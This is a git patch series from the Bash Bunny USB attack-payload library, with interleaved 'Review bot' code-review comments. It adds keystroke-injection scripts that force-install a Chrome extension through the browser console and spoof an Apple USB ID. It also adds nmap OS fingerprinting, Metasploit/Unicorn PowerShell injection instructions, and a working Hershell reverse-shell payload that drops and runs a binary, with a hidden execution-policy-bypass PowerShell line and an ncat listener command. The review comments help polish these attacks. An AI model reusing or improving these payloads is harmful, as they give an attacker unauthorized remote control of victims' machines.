Sat, 27 Jan 2018 18:25:55 -0500 Subject: [PATCH 09/16] fixes mac_happy extension (#313) - fixes state leakage of `command` variable by removing it - remove unecessary use of forked processes/sub-commands - combine input validation conditionals - match the standard of existing extensions of exporting function names as all caps - bump version number --- payloads/extensions/mac_happy.sh | 22 ++++++---------------- 1 file changed, 6 insertions(+), 16 deletions(-) diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh index 2ceb581f..97aabaf0 100755 --- a/payloads/extensions/mac_happy.sh +++ b/payloads/extensions/mac_happy.sh 
@@ -1,26 +1,16 @@ #!/bin/bash -#Title: Mac_Happy +# Title: Mac_Happy # Author: thehappydinoa # Target: Mac -# Version: 0.1 +# Version: 0.2 # # Makes Mac happy by correctly setting pid and vid # Use by running mac_happy ATTACKMODE HID # -function mac_happy() { - [[ -z "$1" ]] && exit 1 # parameter must be set - - [[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE - - for i in $*; - do - command=$(echo $command $i) - done - - command=$(echo $command VID_0X05AC PID_0X021E) - - eval $command +function MAC_HAPPY() { + [[ "$#" -gt 1 && "$1" == "ATTACKMODE" ]] || exit 1 + eval "$@ vid_0x05ac pid_0x021e" } -export -f mac_happy +export -f MAC_HAPPY From 63453543754b9418e97e5ec551e575815013f066 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Sat, 27 Jan 2018 18:26:53 -0500 Subject: [PATCH 10/16] Added chrome extension installer payload (#315) - uses new AUTOETHERNET attackmode - uses new GET TARGET_OS functionality - uses new DEBUG function - uses new MAC_HAPPY extension --- payloads/library/prank/ncage/osx.txt | 55 ++++++++++++++++++++++++ payloads/library/prank/ncage/payload.txt | 44 +++++++++++++++++++ payloads/library/prank/ncage/readme.md | 26 +++++++++++ payloads/library/prank/ncage/win.txt | 35 +++++++++++++++ 4 files changed, 160 insertions(+) create mode 100644 payloads/library/prank/ncage/osx.txt create mode 100644 payloads/library/prank/ncage/payload.txt create mode 100644 payloads/library/prank/ncage/readme.md create mode 100644 payloads/library/prank/ncage/win.txt diff --git a/payloads/library/prank/ncage/osx.txt b/payloads/library/prank/ncage/osx.txt new file mode 100644 index 00000000..e9da9a08 --- /dev/null +++ b/payloads/library/prank/ncage/osx.txt 
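Review bot: The context line `# Use by running mac_happy ATTACKMODE HID` is now wrong, since this hunk renames the function to `MAC_HAPPY`; update it to `# Use by running MAC_HAPPY ATTACKMODE HID`. `exit 1` on a bad argument list terminates the payload shell that called the exported function rather than reporting failure to it; `return 1` lets the caller react, e.g. `MAC_HAPPY ATTACKMODE HID || LED FAIL`. The `eval "$@ vid_0x05ac pid_0x021e"` re-parses every argument (word splitting and globbing); if `ATTACKMODE` is an ordinary command or function, `"$@" vid_0x05ac pid_0x021e` invokes it with the same words and no re-parsing — worth confirming against how `ATTACKMODE` is defined in the firmware.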
@@ -0,0 +1,55 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 1000 + +REM Open Extension URL +GUI SPACE +DELAY 500 +STRING chrome +DELAY 500 +ENTER +DELAY 4000 +GUI l +DELAY 200 +STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 500 +ENTER + +DELAY 3000 + +REM Open the JavaScript console in the browser +REM GUI-ALT j doesn't work, so we have to do it the long way +CTRL F2 +DELAY 100 +STRING v +DELAY 100 +DOWNARROW +DELAY 100 +STRING d +DELAY 100 +RIGHTARROW +DELAY 100 +STRING j +DELAY 100 +ENTER + +DELAY 3000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +REM Depends on a MacOS setting that allows tabbing through dialogs +SHIFT TAB +DELAY 300 +SPACE + +DELAY 4000 + +REM Close the tabs you just opened +GUI w +DELAY 300 +GUI w diff --git a/payloads/library/prank/ncage/payload.txt b/payloads/library/prank/ncage/payload.txt new file mode 100644 index 00000000..7a183600 --- /dev/null +++ b/payloads/library/prank/ncage/payload.txt @@ -0,0 +1,44 @@ +#!/bin/bash + +# ATTENTION: Requires newest firmware with newest extensions + +# Installs the ncage (or any) Google Chrome extension +# using jquery which is kindly supplied by the app store. + +## Status +# | LED | Status | +# | --------- | ----------- | +# | Magenta Solid | Setting up | +# | Blue Blinking | Attacking | +# | Green | Finished | +# | Red | Failed | + +## Setup +LED SETUP +ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10 +GET TARGET_OS +GET SWITCH_POSITION + +LED ATTACK + +case "$TARGET_OS" in + + WINDOWS) + ATTACKMODE HID + QUACK ${SWITCH_POSITION}/win.txt + LED FINISH + ;; + + MACOS) + MAC_HAPPY ATTACKMODE HID + QUACK ${SWITCH_POSITION}/osx.txt + LED FINISH + ;; + + *) + DEBUG "ncage" "OS Not Detected" + LED FAIL2 + ;; + +esac + 
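Review bot: The `*)` arm of the `case "$TARGET_OS"` statement in payload.txt logs "OS Not Detected", but it is also reached for `LINUX` and `UNKNOWN`, both values the GET TARGET_OS extension sets, so a Linux target is reported as undetected. Recording the value makes the debug log usable: `DEBUG "ncage" "Unsupported TARGET_OS: ${TARGET_OS:-unset}"`. The `QUACK ${SWITCH_POSITION}/win.txt` and `osx.txt` lines should quote the expansion, `QUACK "${SWITCH_POSITION}/win.txt"`, for consistency with the quoted `case` selector.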
diff --git a/payloads/library/prank/ncage/readme.md b/payloads/library/prank/ncage/readme.md new file mode 100644 index 00000000..4921cb84 --- /dev/null +++ b/payloads/library/prank/ncage/readme.md @@ -0,0 +1,26 @@ + +# nCage + +Author: audibleblink +Version: 2.0 + +## Description + +ATTENTION: Requires newest firmware (1.5+) with newest extensions + +Installs the ncage (or any) Google Chrome extension +using jquery which is kindly supplied by the app store. + +## Configuration +* Configure each ducky.{win,osx} file to your liking + +## Requirements +Just plug and play + +## Status +| LED | Status | +| --------- | ----------- | +| Magenta Solid | Setting up | +| Blue Blinking | Attacking | +| Green | Finished | + diff --git a/payloads/library/prank/ncage/win.txt b/payloads/library/prank/ncage/win.txt new file mode 100644 index 00000000..ac6a4963 --- /dev/null +++ b/payloads/library/prank/ncage/win.txt @@ -0,0 +1,35 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 3000 + +REM Open Extension URL +GUI r +DELAY 600 +STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 200 +ENTER + +DELAY 8000 + +REM Open the JavaScript console in the browser +CTRL-SHIFT j + +DELAY 4000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +TAB +DELAY 300 +SPACE + +DELAY 5000 + +REM Close the tabs you just opened +CTRL w +DELAY 300 +CTRL w From 9011db7faebf7d3f77a390f1f175b3863f32d3b0 Mon Sep 17 00:00:00 2001 From: Tudor Gheorghiu <32748771+Prodicode@users.noreply.github.com> Date: Sun, 28 Jan 2018 01:27:46 +0200 Subject: [PATCH 11/16] Update unicorn readme.md (#302) --- .../remote_access/Unicorn_PowerShell_Injection/readme.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) 
diff --git a/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md b/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md index 1f199775..9a4ea326 100644 --- a/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md +++ b/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md @@ -16,10 +16,8 @@ Configuring this payload is pretty time-consuming, but it's worth it. 1. Download Trustedsec's Unicorn: https://github.com/trustedsec/unicorn and use it to generate a powershell attack script. 2. After you generate a powershell script, execute ```$ msfconsole -r unicorn.rc``` in the same directory in order to start the listener. -3. Transfer **payload.txt** to any of your switches, then open it. -4. Replace ```your_powershell_attack_here``` with the contents of your **powershell_attack.txt** file which was generated. -5. Put a **\\** (backslash) before each special character (**\,** **\"** **\'** **\:** **\;** **\(** **\)** **\[** **\]** **\+**). -6. Save the **payload.txt** file and eject Bash Bunny. You are good to go! Sessions will be opened in the metasploit's listener! +3. You can use [this software(unicorn bash bunny payload generator)](https://github.com/Prodicode/bash-bunny-unicorn-payload-generator) to generate a **payload.txt** from the **powershell_attack.txt**. +4. Transfer the **payload.txt** to one of the switches on the Bash Bunny. You're ready to go! ## Status From 5f31a0be02cdb701b6605f435d8909258dee449d Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 30 Jan 2018 17:16:23 -0500 Subject: [PATCH 12/16] Fix README.md (#321) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0d9fd4c4..5063984e 100644 --- a/README.md +++ b/README.md 
@@ -1,6 +1,6 @@ # Payload Library for the Bash Bunny by Hak5 -![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") +![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png) * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") From 38a7460fe65be9b70dba1cee61995a7cadf87cf4 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 30 Jan 2018 17:17:09 -0500 Subject: [PATCH 13/16] Update GET TARGET_OS so it works with AUTO_ETHERNET (#320) --- payloads/extensions/get.sh | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index f58026e6..0ebd6e7d 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -19,11 +19,11 @@ function GET() { ;; "TARGET_OS") TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - ScanForOS=$(nmap -Pn -O $TARGET_IP -p1) - [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP) - [[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return - [[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return - [[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return + ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2) + [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2) + [[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return + [[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return + [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; esac From 4df763c4a41682d25831d8ee5b93a39d85e68051 Mon Sep 17 00:00:00 2001 
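Review bot: The three `"${ScanForOS,,}" == *"..."*` checks in get.sh match substrings anywhere in nmap's verbose output, and with `--osscan-guess` a single host can list several OS families, so the check order (now windows, apple, linux) rather than nmap's own ranking decides the result; narrowing the text to the summary lines before comparing, e.g. `ScanForOS=$(grep -E '^(Running|OS details|Aggressive OS guesses):' <<<"$ScanForOS")`, ties the outcome to nmap's best guess. `$TARGET_IP` on the context line is unquoted and may hold several lease addresses, in which case the output of every host is merged before the checks run; the hunk does not address that. The enclosing `GET` function and its `case` begin and end outside the hunk.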
From: Aidan Holland Date: Tue, 30 Jan 2018 17:17:56 -0500 Subject: [PATCH 14/16] Update mac_happy extension (#319) --- payloads/extensions/mac_happy.sh | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh index 97aabaf0..3323a90b 100755 --- a/payloads/extensions/mac_happy.sh +++ b/payloads/extensions/mac_happy.sh @@ -2,15 +2,28 @@ # Title: Mac_Happy # Author: thehappydinoa -# Target: Mac -# Version: 0.2 +# Target: macOS +# Version: 0.3 # # Makes Mac happy by correctly setting pid and vid -# Use by running mac_happy ATTACKMODE HID +# Use by running MAC_HAPPY HID/ETHERNET/... # function MAC_HAPPY() { - [[ "$#" -gt 1 && "$1" == "ATTACKMODE" ]] || exit 1 - eval "$@ vid_0x05ac pid_0x021e" + [[ "$#" -gt 1 ]] || exit 1 + case "$1" in + HID) + ATTACKMODE HID vid_0x05ac pid_0x021e + ;; + ETHERNET) + ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e + ;; + ATTACKMODE) + eval "$@ vid_0x05ac pid_0x021e" + ;; + *) + exit 1 + ;; + esac } export -f MAC_HAPPY From 032061688d61f2ce787a0d1d0db55f03e212a630 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Tue, 30 Jan 2018 22:10:24 -0800 Subject: [PATCH 15/16] WAIT extension pauses until switch position changes --- payloads/extensions/wait.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 payloads/extensions/wait.sh diff --git a/payloads/extensions/wait.sh b/payloads/extensions/wait.sh new file mode 100644 index 00000000..5219bd06 --- /dev/null +++ b/payloads/extensions/wait.sh @@ -0,0 +1,17 @@ +#!/bin/bash +# +# WAIT v1 by @Hak5Darren +# Waits blocks the payload from continuing until the switch position has changed +# Usage: WAIT + +function WAIT() { + GET SWITCH_POSITION + TEST=$SWITCH_POSITION + while true + do GET SWITCH_POSITION + if [ $SWITCH_POSITION != $TEST ]; then break; fi + sleep 1 + done +} + +export -f WAIT From 65d652a15c7a8e683e9d7ff8dfcdbf9046a77401 Mon Sep 17 00:00:00 2001 
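Review bot: `if [ $SWITCH_POSITION != $TEST ]` in WAIT leaves both expansions unquoted, so if `GET SWITCH_POSITION` ever leaves the variable empty the test becomes a `[` usage error instead of a comparison and the loop never breaks; `if [[ "$SWITCH_POSITION" != "$TEST" ]]; then break; fi` compares correctly in both cases. `TEST` is assigned without `local`, so the function leaks a generically named global into the calling payload; `local TEST` before the assignment keeps it contained. The header comment reads "Waits blocks the payload" and should be "Blocks the payload".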
From: metalkey Date: Wed, 11 Apr 2018 21:21:40 +1000 Subject: [PATCH 16/16] Add Hershell Encrypted Reverse shell payload (#335) --- .../README.md | 14 +++ .../payload.txt | 118 ++++++++++++++++++ 2 files changed, 132 insertions(+) create mode 100644 payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md create mode 100644 payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt diff --git a/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md new file mode 100644 index 00000000..d4143993 --- /dev/null +++ b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md @@ -0,0 +1,14 @@ +# Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) + +Author: m3t4lk3y
+Creds: Ronan Kervella (Creator of Hershell)
+Version: Version 0.5
+
+## Instructions
+
+Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
+
+1. Compile all payloads and place binaries in the `payloads\$SWITCH_POSITION` directory (Double check binary names. Defaults are `mac32`, `linux32`, `win32.exe`)
+2. Uncomment desired target OS payload lines and ensure others are commented out
+3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. `ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343`)
+4. Execute attack via Bash Bunny
diff --git a/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt
new file mode 100644
index 00000000..f8f53069
--- /dev/null
+++ b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt
@@ -0,0 +1,118 @@
+#!/bin/bash
+# Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
+# Author: m3t4lk3y
+# Version: 0.5
+# Target: Windows, Mac OSX, Linux
+# Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
+
+# Instructions:
+# Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
+# 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
+# 2. Uncomment desired target OS payload lines and ensure others are commented out
+# 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
+# 4. Execute attack via Bash Bunny
+
+# SETUP
+DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
+LED R
+GET SWITCH_POSITION # Gets switch position (e.g. switch2)
+ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial
+
+# Modified RUN helper
+function RUN() {
+ local os=$1
+ shift
+ [[ -z "$os" || -z "$*" ]] && exit 1
+ case "$os" in
+ WIN)
+ QUACK GUI m
+ QUACK DELAY 500
+ QUACK GUI r
+ QUACK DELAY 500
+ QUACK STRING cmd.exe
+ QUACK DELAY 100
+ QUACK ENTER
+ QUACK DELAY 500
+ QUACK STRING "$@"
+ QUACK DELAY 100
+ QUACK ENTER
+ ;;
+ OSX)
+ QUACK GUI SPACE
+ QUACK DELAY 100
+ QUACK STRING terminal
+ QUACK DELAY 100
+ QUACK ENTER
+ QUACK GUI t
+ QUACK DELAY 100
+ QUACK STRING /bin/bash
+ QUACK DELAY 100
+ QUACK ENTER
+ QUACK STRING "$@"
+ QUACK DELAY 100
+ QUACK ENTER
+ QUACK DELAY 100
+ QUACK STRING "exit"
+ QUACK DELAY 100
+ QUACK ENTER
+ QUACK DELAY 100
+ QUACK STRING "exit"
+ QUACK DELAY 100
+ QUACK ENTER
+ ;;
+ UNITY)
+ QUACK ALT F2
+ QUACK DELAY 1000
+ QUACK STRING xterm
+ QUACK DELAY 1000
+ QUACK ENTER
+ QUACK DELAY 1000
+ QUACK STRING /bin/bash
+ QUACK DELAY 1000
+ QUACK ENTER
+ QUACK DELAY 500
+ QUACK STRING cd /media/'$USER'
+ QUACK DELAY 500
+ QUACK 
ENTER
+ QUACK DELAY 500
+ QUACK STRING "$@"
+ QUACK DELAY 500
+ QUACK ENTER
+ QUACK DELAY 500
+ QUACK STRING "exit"
+ QUACK DELAY 500
+ QUACK ENTER
+ QUACK DELAY 500
+ QUACK STRING "exit"
+ QUACK DELAY 500
+ QUACK ENTER
+ ;;
+ *)
+ exit 1
+ ;;
+ esac
+}
+export -f RUN
+
+# START Attack
+LED Y
+
+# [+] Mac - Uncomment the following lines to use:
+# until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
+# LED Y FAST
+# RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"
+
+# [+] Linux - Uncomment the following lines to use:
+until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
+LED Y FAST
+RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"
+
+# [+] Windows - Uncomment the following lines to use:
+# until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
+# LED Y FAST
+# RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"
+
+# END
+sleep 5
+LED G
+# shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)
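Review bot: `function RUN()` followed by `export -f RUN` redefines and exports the name of the stock RUN extension, so any other extension or payload code in this session that calls `RUN` gets this three-target variant instead; a payload-specific name such as `HERSHELL_RUN` (used on the `RUN UNITY ...` line and the commented `RUN OSX`/`RUN WIN` lines) avoids the clash. The `exit 1` in the argument check and in the `*)` arm terminates the payload while the LED still shows the yellow attack state set by `LED Y FAST`; `return 1` plus an `LED FAIL` at the call site would report the failure instead. `QUACK STRING "$@"` passes the remaining arguments as separate words, so a caller that splits its command over several arguments presumably depends on QUACK re-joining them; the existing calls pass one quoted string, which is worth stating in the "Modified RUN helper" comment.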